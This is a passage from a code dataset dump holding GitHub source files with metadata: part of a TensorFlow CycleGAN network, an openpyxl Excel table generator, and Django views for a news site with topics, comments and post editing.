_get_norm_layer(norm),\n keras.layers.LeakyReLU(alpha=0.2)\n ]\n\n model += [keras.layers.Conv2D(fmaps, 1, strides=1, padding=padding)]\n self.model = keras.Sequential(model)\n\n def call(self, x):\n return self.model(x)", "repo_name": "RioRic/cycleGAN_tf2", "sub_path": "model/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 4456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 9, "usage_type": "name"}, {"api_name": "tensorflow_addons.layers.InstanceNormalization", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow_addons.layers", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 26, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "name"}, {"api_name": "tensorflow.keras.Model", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 68, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 87, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "name"}, {"api_name": "tensorflow.keras.Model", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LeakyReLU", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 117, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 121, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LeakyReLU", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 123, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 126, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "74820122435", "text": "# coding=utf-8\nfrom Tools import coordinate_transfer, style_range, divide_column\nfrom excel_generator.Common import bg_color, font_style, alignment, border_pattern, fill_pattern, alignment_pattern, \\\n font_pattern, side_style, thick_border\nfrom excel_generator.Cube import Cube\nfrom excel_generator.Style import Style\nfrom excel_generator.mock.SGM import page2\nfrom excel_generator.tool.RenderCore import RenderCore\nfrom template.HeaderTemplate import common_header_sgm_1\n\n\nclass MainTable:\n def __init__(self, core, title, header, data, x, y):\n self.title = title\n self.header = header\n self.data = data\n self.origin = [x, y]\n self.end_point = [x, y]\n self.core = core\n\n def _adjust_column_width(self, width):\n for column_cells in self.core.ws.columns:\n # length = max(len(as_text(cell.value)) for cell in column_cells)\n self.core.ws.column_dimensions[column_cells[0].column].width = width\n\n def _render_title(self):\n style = Style(bg_color[4], border=None, font=font_style[3], al=alignment[4])\n\n self.core.write_cube_to_book(self.origin[0], self.origin[1],\n Cube(bg_color[4], value=self.title, style=style))\n\n def _check_cube_style(self, x, y):\n for item in self.header['merge']:\n if item['coordinate'][0] == x and item['coordinate'][1] == y:\n return item['style']\n return Style(bg_color[4], border=side_style[1], font=font_style[2], al=alignment[2])\n\n def _merge_body_cell(self, end_column, end_row, start_column, start_row,\n border, fill, font, al):\n self.core.ws.merge_cells(start_row=start_row,\n start_column=start_column,\n end_row=end_row,\n end_column=end_column)\n # set merge cells style\n coordinate = coordinate_transfer(start_row, start_column) + ':' + coordinate_transfer(end_row, end_column)\n style_range(self.core.ws, coordinate, border, fill, font, al)\n\n def _render_header(self):\n # render cell with style\n scale_x = self.header['scale'][0]\n scale_y = self.header['scale'][1]\n for i in range(scale_x):\n for j in range(scale_y):\n x = i + self.origin[0] + 1\n # y should add title\n y = j + self.origin[1]\n current_value = self.header['data'][i][j]\n checked_style = self._check_cube_style(i, j)\n current_cube = Cube(style=checked_style, value=current_value)\n self.core.write_cube_to_book(x, y, current_cube)\n\n # merge cell\n if self.header['merge'] is not None:\n bx = self.origin[0] + 1\n by = self.origin[1]\n for m in self.header['merge']:\n start_row = m['coordinate'][0] + bx\n start_column = m['coordinate'][1] + by\n end_row = m['coordinate'][2] + bx\n end_column = m['coordinate'][3] + by\n self.core.ws.merge_cells(start_row=start_row,\n start_column=start_column,\n end_row=end_row,\n end_column=end_column)\n # get style of cell need merged\n current_style = m['style']\n\n self._merge_body_cell(end_column, end_row, start_column, start_row,\n border_pattern[current_style.border], fill_pattern[current_style.fill],\n font_pattern[current_style.font], alignment_pattern[current_style.al])\n # set border\n coordinate = coordinate_transfer(start_row, start_column) + ':' + coordinate_transfer(end_row,\n end_column)\n style_range(self.core.ws, coordinate,\n border=border_pattern[current_style.border],\n fill=fill_pattern[current_style.fill],\n font=font_pattern[current_style.font],\n alignment=alignment_pattern[current_style.al])\n\n def _list_divide(self, l1, l2):\n res = []\n for i in range(len(l1)):\n res.append(float(l1[i]) / float(l2[i]))\n return res\n\n def _list_divide_subtract_1(self, l1, l2):\n res = []\n for i in range(len(l1)):\n res.append(float(l1[i]) / float(l2[i]) - 1.0)\n return res\n\n def _cal_end_point(self):\n hx = self.header['scale'][0]\n hy = self.header['scale'][1]\n scale_x = len(self.data)\n self.end_point = [self.origin[0] + hx + scale_x + 1, self.origin[1] + hy - 1]\n\n def _add_table_border(self):\n coordinate = coordinate_transfer(self.origin[0] + 1, self.origin[1]) + ':' + \\\n coordinate_transfer(self.end_point[0], self.end_point[1])\n style_range(self.core.ws, coordinate, thick_border)\n\n def _get_all_data_by_column(self, name):\n res = []\n if name == 'LE KL':\n for p in self.data:\n res.append(p['LE KL'])\n return res\n elif name == 'Market size KL(this year)':\n for p in self.data:\n res.append(p['Market size KL(this year)'])\n return res\n elif name == 'Market size KL(last year)':\n for p in self.data:\n res.append(p['Market size KL(last year)'])\n return res\n elif name == 'Market Share %':\n return self._list_divide(self._get_all_data_by_column('LE KL'),\n self._get_all_data_by_column('Market size KL(this year)'))\n elif name == 'Market Growth %':\n return self._list_divide_subtract_1(self._get_all_data_by_column('Market size KL(this year)'),\n self._get_all_data_by_column('Market size KL(last year)'))\n else:\n pass\n\n def _formula_converter(self, name, row, flag, x, y, number_format):\n tmp_y = y - self.origin[1]\n if tmp_y < 4:\n style = Style(bg_color=bg_color[4], border=side_style[1], al=alignment[1])\n elif tmp_y >= 3 and flag == 0:\n style = Style(bg_color=bg_color[2], border=side_style[1], al=alignment[2])\n elif flag < 0:\n style = Style(bg_color=bg_color[4], border=side_style[1], al=alignment[2])\n else:\n style = Style(bg_color=bg_color[1], border=side_style[1])\n formula = ''\n if flag == 0:\n return Cube(style=style, number_format=number_format, value=row[name])\n elif name == 'Market Share %':\n formula = '={0}/{1}'.format(coordinate_transfer(x, y - 2), coordinate_transfer(x, y - 1))\n\n elif name == 'Market Growth %':\n formula = '={0}/{1}-1'.format(coordinate_transfer(x, y - 3), coordinate_transfer(x, y - 1))\n\n elif name == 'Market Share Score':\n a, b, c, d = divide_column(self._get_all_data_by_column('Market Share %'))\n formula = '=IF({0}<{1}, 5, IF({0}<{2}, 4, IF({0}<{3},3, IF({0}<{4}, 2, 1))))'.format(\n coordinate_transfer(x, y - 4), a, b, c, d)\n\n elif name == 'Market Growth Score':\n a, b, c, d = divide_column(self._get_all_data_by_column('Market Growth %'))\n formula = '=IF({0}<{1}, 5, IF({0}<{2}, 4, IF({0}<{3},3, IF({0}<{4}, 2, 1))))'.format(\n coordinate_transfer(x, y - 3), a, b, c, d)\n\n elif name == 'Market Share Score(0.75)':\n formula = '={0}*0.75'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Market Growth Score(0.15)':\n formula = '={0}*0.15'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Platform Score(0.1)':\n formula = '={0}*0.1'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Platform Score':\n formula = '={0}'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Total Score':\n formula = '=SUM({0}:{1})'.format(coordinate_transfer(x, y - 3), coordinate_transfer(x, y - 1))\n\n elif name == 'Increase %':\n row = len(self.data)\n formula = '={0}*({1}-{2})/SUMPRODUCT({3}:{4},{5}:{6})'.format(\n coordinate_transfer(x, y - 1),\n coordinate_transfer(self.origin[0] + 1 + row + 1, y + 1),\n coordinate_transfer(self.origin[0] + 1 + row, y - 13),\n coordinate_transfer(self.origin[0] + 1 + 1, y - 13),\n coordinate_transfer(self.origin[0] + row, y - 13),\n coordinate_transfer(self.origin[0] + 1 + 1, y - 1),\n coordinate_transfer(self.origin[0] + row, y - 1),\n )\n elif name == 'Ref Target KL':\n formula = '={0}*(1+{1})'.format(coordinate_transfer(x, y - 14), coordinate_transfer(x, y - 1))\n\n else:\n pass\n return Cube(style=style, formula=formula, number_format=number_format)\n\n def _render_body(self):\n bx = self.header['scale'][0] + self.origin[0] + 1\n by = self.origin[1]\n scale_x = len(self.data)\n scale_y = self.header['scale'][1]\n\n for i in range(scale_x):\n for j in range(scale_y):\n cx = bx + i\n cy = by + j\n col_name = self.header['data'][0][j]\n number_format = self.header['number_format'][j]\n formula_flag = self.header['formula'][j]\n current_cube = self._formula_converter(col_name, self.data[i], formula_flag, cx, cy, number_format)\n self.core.write_cube_to_book(cx, cy, current_cube)\n\n def _render_footer(self):\n # render total row\n sum_total = self.header['total']\n scale_x = len(self.data)\n foot_x = self.origin[0] + self.header['scale'][0] + scale_x\n foot_y = self.origin[1]\n for i in range(self.header['scale'][1]):\n if i < 3:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[3], al=alignment[1], font=font_style[2]),\n value='Sum Total')\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n else:\n flag = sum_total[i]\n if flag == 1:\n current_cube = Cube(\n style=Style(bg_color=bg_color[1], border=side_style[3], al=alignment[3], font=font_style[2]))\n start = coordinate_transfer(self.origin[0] + 1 + self.header['scale'][0], foot_y + i)\n end = coordinate_transfer(foot_x - 1, foot_y + i)\n current_cube.set_formula('=SUM({0}:{1})'.format(start, end))\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n else:\n current_cube = Cube(\n style=Style(bg_color=bg_color[1], border=side_style[3], al=alignment[3], font=font_style[2]),\n value='N/A')\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n self._merge_body_cell(foot_y + 3, foot_x, foot_y, foot_x,\n border_pattern[side_style[3]], fill_pattern[bg_color[4]],\n font_pattern[font_style[2]], alignment_pattern[alignment[1]])\n\n # render global\n for i in range(self.header['scale'][1]):\n if i < 3:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[1], al=alignment[1], font=font_style[2]),\n value='Target From Global')\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n elif i < 18:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[1], al=alignment[3], font=font_style[1]),\n value='N/A')\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n else:\n current_cube = Cube(\n style=Style(bg_color=bg_color[3], border=side_style[1], al=alignment[3], font=font_style[2]),\n value=None)\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n self._merge_body_cell(foot_y + 3, foot_x + 1, foot_y, foot_x + 1,\n border_pattern[side_style[1]], fill_pattern[bg_color[4]],\n font_pattern[font_style[2]], alignment_pattern[alignment[1]])\n\n def render(self):\n self._render_title()\n self._render_header()\n self._render_body()\n self._adjust_column_width(16)\n self._render_footer()\n self._cal_end_point()\n self._add_table_border()\n\n\nif __name__ == '__main__':\n from openpyxl import Workbook\n\n wb = Workbook()\n ws = wb.active\n c = RenderCore(ws)\n table = MainTable(c, 'I am Title!', common_header_sgm_1[1], page2, 2, 2)\n table.render()\n table.core.ws.sheet_view.showGridLines = False\n wb.save('SGM.xlsx')\n", "repo_name": "intwzt/ShellExcel", "sub_path": "excel_generator/model/SGM/page1/MainTable.py", "file_name": "MainTable.py", "file_ext": "py", "file_size_in_byte": 13281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "excel_generator.Style.Style", "line_number": 27, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 30, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 30, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 36, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 36, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 45, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 46, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 59, "usage_type": "call"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 79, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 79, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 80, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 80, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 82, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 84, "usage_type": "call"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 85, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 86, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 87, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 88, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 109, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 110, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 111, "usage_type": "call"}, {"api_name": "excel_generator.Common.thick_border", "line_number": 111, "usage_type": "argument"}, {"api_name": "excel_generator.Style.Style", "line_number": 139, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 141, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 143, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 145, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 145, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 145, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 148, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 150, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 153, "usage_type": "call"}, {"api_name": "Tools.divide_column", "line_number": 156, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 158, "usage_type": "call"}, {"api_name": "Tools.divide_column", "line_number": 161, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 163, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 166, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 169, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 172, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 175, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 178, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 183, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 184, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 185, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 186, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 187, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 188, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 189, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 192, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 196, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 222, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 223, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 229, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 230, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 230, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 231, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 232, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 236, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 237, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 247, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 248, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 252, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 253, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 257, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 258, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 263, "usage_type": "name"}, {"api_name": "openpyxl.Workbook", "line_number": 278, "usage_type": "call"}, {"api_name": "excel_generator.tool.RenderCore.RenderCore", "line_number": 280, "usage_type": "call"}, {"api_name": "excel_generator.mock.SGM.page2", "line_number": 281, "usage_type": "argument"}, {"api_name": "template.HeaderTemplate.common_header_sgm_1", "line_number": 281, "usage_type": "name"}]} +{"seq_id": "41493880983", "text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import NewsType,NewsTopic,posts\nfrom .forms import NewNewsForm,CommentForm\nfrom django.views.generic import UpdateView,ListView\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Count\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nimport datetime as dt\n# Create your views here.\ndef News(request,news_id):\n news = get_object_or_404(NewsType, pk=news_id)\n #عمل عمود وهمي في الجدول عن طريق annotate\n #coulmn name= comments\n #queryset = news.topics.order_by('-created_dt').annotate(comments=Count('posts'))\n #queryset = NewsTopic.objects.filter(type__type = news).order_by('-description')\n queryset = NewsTopic.objects.filter(type__type = news)\n page = request.GET.get('page', 1)\n paginator = Paginator(queryset, 20)\n try:\n topics = paginator.page(page)\n except PageNotAnInteger:\n topics = paginator.page(1)\n except EmptyPage:\n topics = paginator.page(paginator.num_pages)\n return render(request,'news/news.html',{'n':news,'topics':topics})\n#او بطريقة GCBV\n#class NewsListView(ListView):\n # model= NewsType\n # context_object_name = 'n'\n # page_kwarg = 'news_id'\n #template_name='news/news.html'\n@login_required\ndef NewNews(request,news_id):\n news = get_object_or_404(NewsType, pk=news_id)\n if (request.method == \"POST\"):\n form = NewNewsForm(request.POST)\n if form.is_valid():\n topic = form.save(commit=False)\n # to save the user who create the news :\n #created_by= request.user\n topic.type= news\n topic.save()\n\n return redirect('news_page', news_id=news.pk)\n else:\n form = NewNewsForm()\n return render(request, 'news/new_news.html', {'form': form})\n\ndef topic_posts(request,news_id,topic_id):\n topic = get_object_or_404(NewsTopic,type__id=news_id,pk=topic_id)\n return render(request,'news/topic_posts.html',{'topic':topic})\ndef comment(request,news_id,topic_id):\n topic = get_object_or_404(NewsTopic,type__id=news_id,pk=topic_id)\n if (request.method == \"POST\"):\n form = CommentForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n # to save the user who create the news :\n post.created_by= request.user\n post.topic = topic\n post.save()\n return redirect('topic_posts', news_id=topic.type.pk,topic_id=topic.pk)\n else:\n form = CommentForm()\n return render(request,'news/comment.html',{'topic':topic,'form':form})\n#طريقة اخرى لكتابة view\n#تسمى هذه الطريقة ب GCBV\n#وهي تعتمد على كلاس جاهز وتعطيه بعض المعلومات وفنكشن\nclass PostUpdateView(UpdateView):\n model = posts\n fields = ('message',)\n template_name = 'news/edit_post.html'\n pk_url_kwarg = 'post_id'\n context_object_name = 'post'\n def form_valid(self, form):\n post=form.save(commit=False)\n post.updated_date = timezone.now()\n post.save()\n return redirect('topic_posts',news_id=post.topic.type.pk,topic_id=post.topic.pk)\n", "repo_name": "ahedmafarjeh/cars_news_django_d_project", "sub_path": "news/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.NewsType", "line_number": 12, "usage_type": "argument"}, {"api_name": "models.NewsTopic.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.NewsTopic.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.NewsTopic", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 19, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.NewsType", "line_number": 35, "usage_type": "argument"}, {"api_name": "forms.NewNewsForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 45, "usage_type": "call"}, {"api_name": "forms.NewNewsForm", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 51, "usage_type": "call"}, {"api_name": "models.NewsTopic", "line_number": 51, "usage_type": "argument"}, {"api_name": 